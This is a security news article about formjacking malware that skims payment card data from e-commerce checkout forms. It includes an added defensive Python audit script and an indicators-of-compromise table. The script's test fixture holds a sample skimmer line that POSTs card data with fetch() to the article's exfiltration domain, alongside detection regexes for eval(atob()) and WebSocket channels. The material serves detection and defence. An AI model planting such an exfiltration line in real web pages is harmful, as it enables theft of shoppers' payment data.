A new wave of cyberattacks using formjacking malware has been detected, specifically targeting e-commerce platforms to exfiltrate payment card information.
Cybersecurity researchers observed that threat actors are leveraging sophisticated JavaScript-based payloads, which inject malicious code directly into the client-side payment forms of vulnerable online retailers.
The primary objective is to intercept and exfiltrate sensitive payment data, including credit card numbers, expiration dates, CVVs, and cardholder names as customers complete their transactions.
Sophisticated Threats Exploit Online Payment Forms
Formjacking, also referred to as web skimming, has evolved as attackers refine their techniques to bypass common security controls.
Recent incidents highlight the use of highly obfuscated scripts, often delivered through compromised third-party services or direct exploitation of website backends.
The injected scripts are triggered upon page load or form submission, silently capturing input fields and transmitting the harvested data to remote command-and-control (C2) servers controlled by the attackers.
Investigations have revealed that adversaries are increasingly employing real-time evasion tactics.
For instance, malicious scripts can fingerprint visiting clients to ensure payloads are not exposed to security analysts or automated scans.
Data exfiltration methods have also progressed, with attackers utilizing HTTPS POST requests, WebSocket connections, and even DNS tunneling to stealthily transfer stolen information.
E-commerce platforms running outdated content management systems or plugins are at heightened risk, as these vulnerabilities are commonly exploited vectors for initial access.
In several observed breaches, attackers maintained persistent access by deploying backdoors or modifying core scripts within the payment workflow.
Security teams noted that the malicious code often contains self-destruct or update mechanisms, enabling attackers to remove evidence if detection is imminent.
Incident Response Accelerated
Leading cybersecurity vendors have responded by releasing updated signatures and YARA rules to identify and quarantine formjacking threats.
However, the rapid mutation of malware strains and the use of living-off-the-land techniques complicate defense efforts.
Threat intelligence analysts recommend regular integrity checks of critical web assets, enhanced monitoring of third-party dependencies, and adopting a Content Security Policy (CSP) to mitigate script injection risks.
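The following is an added example, not code from the article or from any vendor it mentions. It shows what the recommended integrity check and third-party monitoring look like as a defender-side audit: each served first-party script is hashed against a deploy-time baseline, third-party scripts loaded without Subresource Integrity are flagged, and every script body is scanned for the skimmer markers described above (the `eval(atob(...))` pattern and network destinations outside a first-party allowlist). The HTML, the "known-good" and "tampered" script bodies, the allowlist hosts (`shop.example`, `cdn.shop.example`) and the baseline are all constructed here so the code runs offline; the exfiltration domain and the jsDelivr path are taken from the article's IOC table.

```python
"""Added example (not from the article): offline integrity and skimmer-marker
audit for an e-commerce checkout page, standard library only."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts the checkout page is allowed to load from or talk to.
FIRST_PARTY_HOSTS = {"shop.example", "cdn.shop.example"}

# Constructed sample: the checkout script as deployed (known-good copy).
KNOWN_GOOD_JS = (
    "document.getElementById('pay').addEventListener('submit', validate);\n"
)
# Constructed sample: the same file after a skimmer was appended. The
# eval(atob('...')) marker and the POST endpoint mirror the article's IOCs;
# 'Li4u' is just base64 for '...', so nothing here does anything.
TAMPERED_JS = KNOWN_GOOD_JS + (
    "eval(atob('Li4u'));\n"
    "fetch('https://paysecure-online.com/submit/cardinfo.php',"
    "{method:'POST',body:JSON.stringify(cardData)});\n"
)
# Constructed sample checkout page: one first-party script (pinned with a
# placeholder SRI value) and one third-party script loaded without SRI.
CHECKOUT_HTML = """
<html><body><form id="pay">...</form>
<script src="/assets/js/checkout.min.js"
        integrity="sha256-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.js"></script>
</body></html>
"""


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Baseline recorded at deploy time: served path -> SHA-256 of the file content.
BASELINE = {"/assets/js/checkout.min.js": sha256_hex(KNOWN_GOOD_JS)}

# Obfuscation / channel markers from the article (constructed regexes; tune
# them against your own codebase to keep false positives low).
PATTERNS = {
    "eval_atob": re.compile(r"\beval\s*\(\s*atob\s*\("),
    "websocket": re.compile(r"new\s+WebSocket\s*\("),
}
# Any quoted http(s)/ws(s) URL literal inside a script body.
URL_RE = re.compile(r"""["'](https?://[^"']+|wss?://[^"']+)["']""")


def check_integrity(path: str, content: str, baseline=BASELINE) -> bool:
    """True when the served file still hashes to its deploy-time baseline."""
    return baseline.get(path) == sha256_hex(content)


def scan_script(content: str, allowed_hosts=FIRST_PARTY_HOSTS) -> list:
    """Findings for one script body: marker names, plus every network
    destination whose host is not on the first-party allowlist."""
    findings = [name for name, rx in PATTERNS.items() if rx.search(content)]
    for url in URL_RE.findall(content):
        host = urlparse(url).hostname
        if host and host not in allowed_hosts:
            findings.append(f"external_destination:{host}")
    return findings


class _ScriptTags(HTMLParser):
    """Collects the attributes of every <script> tag on the page."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.tags.append(dict(attrs))


def audit_page(html: str, served: dict, allowed_hosts=FIRST_PARTY_HOSTS,
               baseline=BASELINE) -> dict:
    """Map each script src to its issues. `served` holds the script bodies
    actually delivered to the browser (path/URL -> text); bodies that were not
    captured are only checked for the SRI attribute."""
    parser = _ScriptTags()
    parser.feed(html)
    report = {}
    for attrs in parser.tags:
        src = attrs.get("src")
        if not src:
            continue
        issues = []
        host = urlparse(src).hostname
        if host and host not in allowed_hosts and "integrity" not in attrs:
            issues.append("third_party_without_sri")
        body = served.get(src)
        if body is not None:
            if src in baseline and not check_integrity(src, body, baseline):
                issues.append("baseline_hash_mismatch")
            issues.extend(scan_script(body, allowed_hosts))
        report[src] = issues
    return report


if __name__ == "__main__":
    for src, issues in audit_page(CHECKOUT_HTML,
                                  {"/assets/js/checkout.min.js": TAMPERED_JS}).items():
        print(src, "->", issues or "clean")
```

In production the `served` bodies come from fetching the live checkout page with a browser-like client on a schedule, so that a skimmer injected server-side or via a compromised CDN is caught at the point where customers would actually receive it; the baseline is regenerated on every deploy. An `external_destination` finding is the high-value signal here, since exfiltration needs a destination, while `eval_atob` alone is a prompt to read the script, not proof of compromise. A CSP whose `script-src` and `connect-src` list only the allowlisted hosts complements this check by blocking the same destinations in the browser.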
Victim organizations have been urged to conduct thorough incident response processes, including forensic analysis and end-to-end review of web application logs.
Customer notification and credit monitoring are advised where payment data compromise is suspected.
Law enforcement agencies, in collaboration with private sector partners, are investigating cross-border syndicates believed to be orchestrating these attacks.
The prevalence of formjacking underscores the necessity for robust web security posture management.
As attackers continue to innovate, only layered defenses, routine code audits, and real-time threat intelligence sharing offer viable protection for merchants and their customers.
Indicators of Compromise (IOC)
| IOC Type | Example Value | Description |
|---|---|---|
| Malicious JS File | /assets/js/checkout.min.js | Injected JavaScript file with payload |
| Suspicious Domain | paysecure-online[.]com | C2 domain used for data exfiltration |
| IP Address | 185.243.115.12 | IP hosting malware payloads |
| Obfuscated Script Function | eval(atob('...')) | Encoded function executing malicious code |
| Unusual POST Request Path | /submit/cardinfo.php | Endpoint receiving intercepted data |
| Modified Web Asset Hash | SHA256: 9fc9b2e6... | Tampered asset hash for integrity check |
| Third-Party Library Source | cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.js | Compromised vendor script (modified) |
| User Agent String | Mozilla/5.0 (compatible; Googlebot/2.1;) | Spoofed to evade detection |